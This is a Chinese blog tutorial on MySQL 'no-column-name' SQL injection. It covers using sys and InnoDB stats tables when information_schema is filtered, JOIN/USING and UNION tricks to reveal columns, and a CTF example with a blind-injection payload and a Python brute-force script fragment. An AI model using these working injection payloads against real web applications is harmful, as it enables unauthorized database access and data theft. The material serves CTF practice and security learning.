深入浅出带你学习无列名注入

最新推荐文章于 2024-03-29 23:31:28 发布
最新推荐文章于 2024-03-29 23:31:28 发布
阅读量1k 收藏 2
点赞数 1
文章标签: 学习 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/web2022050903/article/details/129071021
版权

前言

大家对于SQL注入一定不陌生,我们常用的SQL注入方法是通过information_schema这个默认数据库来实现,可是你有没有想过,如果过滤了该数据库那么我们如何进行SQL语句的查询呢,本文就带给大家如何通过不使用information_schema来进行SQL注入,下面我们展开来讲。

基础知识

首先我们先了解一下什么版本可以使用无列名注入:

MySQL < 5版本,或者在 MySQL >= 5 的版本[存在information_schema库]

我们先看查询表名,因为information_schema被过滤了,所以我们需要找到代替该函数的,这里有以下两个方法来进行查询:

sys数据库

MYSQL在5.7以上版本新增的数据库,基础数据来自information_schema和performance_chema,但是值得注意的是SYS数据库本身不储存任何数据。我们可以通过其中的schema_auto_increment_columns来获取表名。

InnoDb引擎

在MYSQL5.5.8及以上版本,InnoDB成为其默认存储引擎。同时MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats表,里面存储了数据库和其数据表的信息,需要注意的是这两个表里没有存储列名。

通过以上方法我们可以获取数据库名和表名,但是我们不知道列明,接下来就进入无列名注入的环节。

JOIN

首先来讲利用JOIN去进行无列名注入,通过JOIN建立两个表之间的内连接,也就是说将两张表的列名给加起来,可能会爆出相同的列明的名字,我们利用的就是这个特性来爆出列明。下面给大家进行演示:

当我们通过查询获取到表名之后,使用下面的PAYLOAD获取列名:

?id=-1' union all select * from (select * from users as a join users as b)as c--+

简单分析一下AS的作用是取别名,把users表当做a,join起连接作用,下面看看执行效果:

可以看到获取到了第一列数据id,之后我们使用using来声明内连接,比如我要查第二列的数据:

?id=-1' union all select*from (select * from users as a join users b using(id))c--+

此时就会给我们回显第二列的数据,剩下的以此类推。

union select

平常我们查询语句大致为一下类型:

mysql> select * from xino;

但是当我们知道表中有几个列时,可以进行下面的查询:

select 1,2,3, union select * from xino;

此时你会发现新建了一个虚拟表,里面存储了xino表里的所有数据:

我们可以通过查询数字来查询数据:

select `3` from (select 1,2,3 union select * from xino)a;

可以看到成功查询。

例题

了解完以上内容后我们来看一下例题去巩固一下:打开题目查看源码:

需要我们POST一个id的参数,考虑是SQL注入,fuzz了一下后发现过滤了in,也就是说不能用平常的SQL注入来查表了,我们考虑使用:

sys.schema_table_statistics_with_buffer

来查询表名,因为涉及盲注,查询错误返回给我们NULL,构造poc:

0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),1,1))>32)

可以写一个脚本来查,最后得到表名为:

f1ag_1s_h3r3_hhhhh

因为union被过滤了,我们尝试别的无列名注入方法,这里采用加括号逐位比较大小的方法,具体可以看下面的poc:

1&&((select 1,"f")>(select * from flag_is_here))

通过逐个比较来进行判断,不过需要我们来写一个脚本这里就贴一下重点代码吧:

 while letf < right:s = flagmid = (letf+right) // 2s = s + chr(mid)payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"data = {"id":payload}res = requests.post(url=url,data=data).text

最后可以跑出flag。

结语

今天给大家带来了无列名注入的知识点不知道大家学会了没有,简单来说无列名注入还是挺考察思维的需要我们构造查询的payload并写出脚本,有兴趣的小伙伴不妨自己去试一下,喜欢本文希望可以一键三连支持一下。

最后

最近找到一个VUE的文档,它将VUE的各个知识点进行了总结,整理成了《Vue 开发必须知道的36个技巧》。内容比较详实,对各个知识点的讲解也十分到位。



有需要的小伙伴,可以点击下方卡片领取,无偿分享

东方睡衣
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
深入浅出机器学习算法:主成分分析
01-27
在对实际问题进行数据挖掘时,涉及到的特证数即数据维度往往是成百上千的,出于以下两个原因可能导致数据集质量不佳:噪声特征:该特征并不能对我们建模产生正向作用,或者同关注的变量基本上是不相关的 特征之间可替代性:当两个特征包含几乎一模一样的信息时,其中一个特征往往是可以剔除的(比如温度和体感温度变量) 主成分分析PrincipalComponentAnalysis,PCA是最常用的降维方法之一,它可以尽可能提取众多维度
深入浅出Python机器学习.pdf
02-23
本人总结的关于机器学习的核心内容 全部实例都调试过 都可以直接运行
深入浅出机器学习》之强化学习
01-27
本文来自于简书,本文章主要通过举例来论证机器学习算法,通过矩阵进行强化学习介绍。所谓强化学习就是智能系统从环境到行为映射的学习,以使奖励信号(强化信号)函数值最大。如果Agent的某个行为策略导致环境正的奖赏(强化信号),那么Agent以后产生这个行为策略的趋势便会加强 -《百科》
SQL注入之 无注入 原理详解
Jay17的博客
09-17 575
SQL注入之 无注入 原理详解
SQL注入绕过之过滤了‘as‘与无注入
NLost
06-03 1466
当过滤了as时 当column被过滤的无注入 利用sys.schema_auto_increment_columns 新特性
SQL无注入方法总结(基于union, join)
DawdleD的博客
05-25 2665
本文要点 通过对基于join的无注入攻击的研究,本文提出了一种场景以及对应的攻击方法,该攻击方法不需要使用using关键字。 本文整理了相关的博文,将在篇末展示(由于该篇博文是原创博文所以我不会把它们的内容照搬过来,请自行取阅) 一种基于join的无注入-1 select Host,User,Select_priv from user where User="root" 在上述场景中用户可以控制的输入是字符串"root",假设的攻击场景中我们可以突破双引号闭合并进行任意sql注入。但是我们
SQL注入之无注入
weixin_46330722的博客
11-10 4052
注入概念原理利用 概念 在我们进行sql注入的时候,有时候information_schema这个库可能会因为过滤而无法调用,这是我们就不能通过这个库来查出表名和名。这时我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储名。 sys数据库 在5.7以上
名&位或注入随记
Aiwin的博客
02-07 839
名&位或注入随记
SQL注入绕过正则及无注入
热门推荐
钟言的博客
12-19 1万+
本篇为SQL注入绕过正则表达式及无注入,详细内容包含了select\bNslS]bfrom正则 科学计数法绕过 过滤information 四、无注入 1、利用 join-using 注名 2、无名查询 五、报错注入7大常用函数 1.ST LatFromGeoHash() (mysql>=5.7.x)payload 2.ST LongFromGeoHash (mysql>=5.7.x) payload 3.GTID (MySQL >= 5.6.X - 显错
SQL无注入
qq_66013948的博客
03-03 1115
​ 二次注入就是指以储存(数据库、文件)的用户输入被读取后再次进入到SQL查询语句中导致注入
MySQL在不知道名情况下的注入详解
09-09
主要给大家介绍了关于MySQL在不知道名情况下的注入的相关资料,文中通过示例代码介绍的非常详细,对大家学习或者使用mysql具有一定的参考学习价值,需要的朋友们下面来一起学习学习
sql注入_表名、名字典
05-06
union select * from 表名字典 union select 名字典 from 表名
强化学习深入浅出完全教程
06-09
深入浅出地介绍强化学习的概念,算法发展历史,分类,及发展趋势。强化学习深入浅出完全教程,内容包括强化学习概述、马尔科夫决策过程、基于模型的动态规划方法、蒙特卡罗方法、时间差分方法、Gym环境构建及强化...
SQL注入——字符型注入和无注入实例(超详细,小白也能学得会)
m0_69151365的博客
01-28 1085
在这一关中,我们首先判断了sql注入类型,发现是字符型注入,我们先是利用order by 来确定该表中的数,有了数我们就可以通过database()函数获取到该网站所在的库,我们在information_schema 库中通过刚才获取的库名作为我们的筛选条件在tables表中查询到了该库中的所有表,又在columns表通过过滤table_name和table_schema两个字段查找出users表中的(字段)信息,到这一步之后我们就直接在users表中查找用户和密码,此时注入完成。
SQL--报错注入(join无注入)
最新发布
weixin_74020633的博客
03-29 437
报错语句中出现了''1''',其中1'是输入的,那么应该是什么闭合呢,一开始我以为是双引号闭合,然后把后面的双引号注释掉,但是报错了。fuzz测试后,过滤了一些东西(or用||代替,=用like代替,as,column),需要爆库名,用到database,但是as被过滤了,这里有又是没见过的,通过查询不存在的库名,报错回显出库名。join是把两张表的名相加,就导致有可能会产生相同的表名,但是jion不允许合并的两个表中有相同的名,因此通过报错得到名。看题,典型的SQL注入
SQL注入类型与技巧
求大佬师傅带
09-01 3684
SQL注入类型与技巧
SQL注入(一)联合查询 报错注入
m0_63306943的博客
04-21 1768
是web网站的常见攻击技术,如果权限足够的话它可以通过sql注入的方式1.知道物理路径可以进行木马的上传2.可以进行udf的提权3.可以通过注入获取到数据库中的数据。sql注入产生的原因:在数据交互中,前端的数据传入到后台处理时,由于后端没有做严格的判断,导致其传入的“数据拼接到SQL语句中后,被当作SQL语句的一部分执行。
2021-7-26 [SWPU2019]Web1 知识点:mysql无注入
m0_51326092的博客
07-26 401
文章目录前言前置知识解题过程总结 前言 其实这道题昨天就做到了,昨天不会做只能去看大佬题解,一开始自己尝试了一会以为是xss,结果看大佬博客发现是mysql的无注入,也是经典的留言板二次注入,o(╥﹏╥)o又学习到了新知识点,今天再来复现一遍!(好像BUU复现的题目查询到表名只有一种方法了,比赛时好像有多种) 借鉴的大佬博客: https://www.cnblogs.com/wangtanzhi/p/12241499.html https://www.cnblogs.com/Lee-404/p/128
深入浅出python机器学习[pdf]
08-30
深入浅出Python机器学习》是一本介绍Python机器学习的入门级书籍。本书适合初学者,通过简洁明了的语言和实用的示例来引导读者学习机器学习的基本原理和Python编程技巧。 这本书首先介绍了机器学习的基本概念和应用场景。作者通过举例解释了监督学习、无监督学习和半监督学习等机器学习方法的基本原理和应用领域。读者可以通过这些例子了解到机器学习在图像识别、文本分类、推荐系统等领域的应用。 接下来,本书详细介绍了Python机器学习框架的使用。作者详细介绍了NumPy、Pandas和Scikit-learn等常用的Python机器学习库的基本功能和用法,读者可以通过这些库来实现和优化自己的机器学习算法。 在学习机器学习算法的过程中,本书给出了大量的机器学习算法实例。作者通过手把手地讲解,实战展示了线性回归、决策树、支持向量机等常见的机器学习算法的原理和应用。读者可以通过这些实例学习到如何选择并应用不同的机器学习算法解决实际问题。 此外,本书还介绍了交叉验证、特征选择和模型评估等机器学习相关的技术和方法。这些内容为读者提供了更全面的机器学习知识体系,帮助读者更好地理解和应用机器学习算法。 总的来说,《深入浅出Python机器学习》是一本结合理论与实践的实用教材,对于想要了解机器学习并使用Python实现算法的读者来说是一本很好的参考书籍。它将机器学习的基本原理和Python编程技巧有机地结合在一起,帮助读者快速入门并能够应用机器学习算法解决实际问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值